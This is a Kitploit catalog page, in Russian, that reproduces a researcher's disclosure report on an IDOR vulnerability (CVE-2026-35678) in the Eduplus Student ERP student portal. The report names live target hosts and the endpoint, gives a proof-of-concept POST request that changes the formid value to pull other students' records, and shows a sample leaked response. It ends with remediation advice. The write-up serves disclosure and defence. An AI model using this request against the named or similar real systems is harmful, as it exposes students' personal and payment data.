Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-35678 — Подробный отчет об исследовании уязвимости IDOR в Eduplus Student ERP, включающий технический анализ, PoC, оценку воздействия и рекомендации по устранению. | Kitploit
Инструменты/GitHubGitHub/sharma19d/cve-2026-35678
Анализ уязвимостейЭксплуатацияСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubsharma19d/cve-2026-35678

CVE-2026-35678

Подробный отчет об исследовании уязвимости IDOR в Eduplus Student ERP, включающий технический анализ, PoC, оценку воздействия и рекомендации по устранению.

Репозиторий
45 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Отчет об исследовании уязвимости: Небезопасная прямая ссылка на объект (IDOR) во всех Eduplus Student ERP

Исследователь: Винай Шарма

1. Краткое резюме

В данном отчете описывается уязвимость высокой степени серьезности, обнаруженная в платформе Eduplus Student ERP, в частности в студенческом портале обучающегося (learnerapi.pceterp.in). Приложение подвержено универсальной небезопасной прямой ссылке на объект (IDOR) в конечной точке подачи экзаменационной формы, что позволяет любому аутентифицированному пользователю (студенту) получать конфиденциальные персональные и финансовые данные любого другого студента путем манипулирования идентификаторами форм.

Уязвимость позволяет осуществлять массовый сбор данных о студентах, включая персональные данные (PII) и подробные журналы аудита финансовых транзакций.


2. Сведения об уязвимости

  • Целевой хост: learnerapi.pceterp.in, learner.zealerp.in, learner.despu.edu.in и др.
  • Затронутая конечная точка: POST /ExamForm/viewSubmitExamForm
  • Типы уязвимостей:
    • Небезопасная прямая ссылка на объект (IDOR) [CWE-639]
    • Слабая криптография (AES-ECB с жестко заданным ключом) [CWE-327, CWE-798]
    • Раскрытие конфиденциальных данных [CWE-312]
  • Серьезность: Высокая (Оценочный CVSS v3.1: 7.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

  • 3. Технический анализ

    3.1 Небезопасная прямая ссылка на объект (IDOR)

    Уязвимость находится в конечной точке viewSubmitExamForm. Сервер полагается на два параметра, предоставляемых клиентом, для идентификации записи, которую необходимо получить:

    1. Тело запроса: {"formid": "XXXXX"}
    2. HTTP-заголовок: Router-Path: /view-pcu-exam-form/XXXXX

    Хотя пользователь должен быть аутентифицирован, сервер не проверяет, авторизован ли аутентифицированный студент для просмотра данных, связанных с запрошенным formid. Перебирая числовые идентификаторы, злоумышленник может получить доступ к записям других студентов.

    4. Подтверждение концепции (PoC)

    4.1 Эксплуатация IDOR

    Стандартный POST-запрос к уязвимой конечной точке с измененным formid возвращает конфиденциальные данные студента.

    Запрос:

    root@kitploit:~
    POST /ExamForm/viewSubmitExamForm HTTP/2
    Host: learnerapi.pceterp.in
    Content-Type: application/json
    Router-Path: /view-pcu-exam-form/28984
    ... (Authenticated Headers) ...
    
    {"formid":"28984"}
    

    Ответ (Сводка утекших данных):

    root@kitploit:~
    {
      "status": "200",
      "examFormname": "B.Tech - Sem VI - Regular",
      "receipt_no": "REC/2023/54321",
      "feespaiddate": "2023-10-15",
      "ispaymentdone": {
        "username": "[email protected]",
        "received_amount": "1500.0",
        "updation_ip_address": "103.x.x.x",
        "erp_transaction_id": "ERP_998877",
        "bank_transaction_id": "BANK_ABC123",
        "paymentgateway_transaction_id": "PG_XYZ789",
        "learner": {
          "id": "12345"
        }
      }
    }
    
    5
    4
    3
    2
    1

    Загрузка Idorpoc.mp4…


    5. Оценка воздействия

    Успешная эксплуатация данной уязвимости позволяет:

    • Массовое раскрытие PII: Доступ к именам, адресам электронной почты, идентификаторам студентов и IP-адресам входа всего студенческого состава.
    • Утечка финансовых данных: Раскрытие истории транзакций, банковских идентификаторов и ссылок на платежные шлюзы. Эта информация является крайне конфиденциальной и может быть использована для финансовой социальной инженерии или мошенничества.
    • Нарушение академической конфиденциальности: Несанкционированный доступ к экзаменационным формам, назначенным наставникам и статусам подачи.

    6. Рекомендации по устранению

    6.1 Исправление авторизации (Приоритет: Высокий)

    • Внедрите проверки авторизации на стороне сервера: Серверная часть должна проверять, что запрошенный formid принадлежит learnerid, связанному с активной сессией. Никогда не доверяйте параметрам formid или Router-Path без проверки по токену аутентифицированной сессии.

    6.3 Общее усиление защиты

    • Минимизируйте вывод данных: Убедитесь, что API возвращает только те поля, которые необходимы для конкретного представления пользовательского интерфейса. Внутренние идентификаторы транзакций и IP-адреса должны быть скрыты, если они не являются абсолютно необходимыми для рабочего процесса пользователя.
    • Безопасность сессий: Пересмотрите использование пользовательских зашифрованных заголовков для управления сессиями и рассмотрите возможность использования стандартных, усиленных JWT или защищенных HTTP-only cookie.
    Скачать инструмент